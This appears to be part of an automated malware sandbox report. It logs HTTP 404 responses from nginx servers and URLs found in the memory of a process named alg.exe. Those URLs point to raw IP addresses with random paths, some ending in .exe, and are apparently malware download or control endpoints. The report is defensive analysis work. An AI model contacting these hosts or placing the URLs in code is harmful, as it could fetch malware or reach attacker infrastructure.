64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:35:37 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:35:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:35:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 04 Mar 2025 08:36:08 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 04 Mar 2025 08:36:09 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:36:32 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:36:32 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: alg.exe, 0000000D.00000003.2181291982.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2259482527.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2200527185.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2267339346.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2229080820.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2246556685.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2210269453.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/kgihcqktxx
              Source: alg.exe, 0000000D.00000003.2259482527.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2246556685.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/ksbp
              Source: alg.exe, 0000000D.00000003.1913930438.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944474303.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914915915.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907846105.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1908959853.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907606835.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/lljqple
              Source: alg.exe, 0000000D.00000003.1907846105.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/lljqple0b1d
              Source: alg.exe, 0000000D.00000003.1913930438.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944474303.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914915915.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1908959853.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907606835.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/lljqplest.exe
              Source: alg.exe, 0000000D.00000003.2025611759.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040378345.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2000758926.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007952814.0000000000538000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2017070889.0000000000538000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032923896.0000000000538000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/tpyri7444
              Source: alg.exe, 0000000D.00000003.1917967381.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914053502.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932808513.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907846105.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944621326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/lljqple
              Source: alg.exe, 0000000D.00000003.2046169214.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2088717654.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040810220.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/seueafvlbcmx
              Source: alg.exe, 0000000D.00000003.2041235754.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/seueafvlbcmxpbe
              Source: alg.exe, 0000000D.00000003.2046169214.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2046971759.000000000050E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2064037327.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/vqrfhgg
              Source: alg.exe, 0000000D.00000003.2067214816.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2046169214.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/vqrfhggc
              Source: alg.exe, 0000000D.00000003.2046971759.000000000050E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/vqrfhggs
              Source: alg.exe, 0000000D.00000003.2040810220.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20:80/seueafvlbcmx
              Source: alg.exe, 0000000D.00000003.1917967381.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932808513.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/eyajoanbw
              Source: alg.exe, 0000000D.00000003.1944474303.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/eyajoanbw.exe
              Source: alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/eyajoanbwM
              Source: alg.exe, 0000000D.00000003.2181291982.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2163395398.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2154720665.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2144486551.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/gtvqg
              Source: alg.exe, 0000000D.00000003.2106093399.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/llkyp
              Source: alg.exe, 0000000D.00000003.1944474303.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/wgmealrwqlbauh
              Source: alg.exe, 0000000D.00000003.1957847112.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932292743.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1973326884.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1943728081.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2000758926.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/wgmealrwqlbauhTf
              Source: alg.exe, 0000000D.00000003.1572794877.0000000000532000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1576172278.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1576253777.000000000052F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1575202487.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1576298008.000000000050E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/xfhngbevi
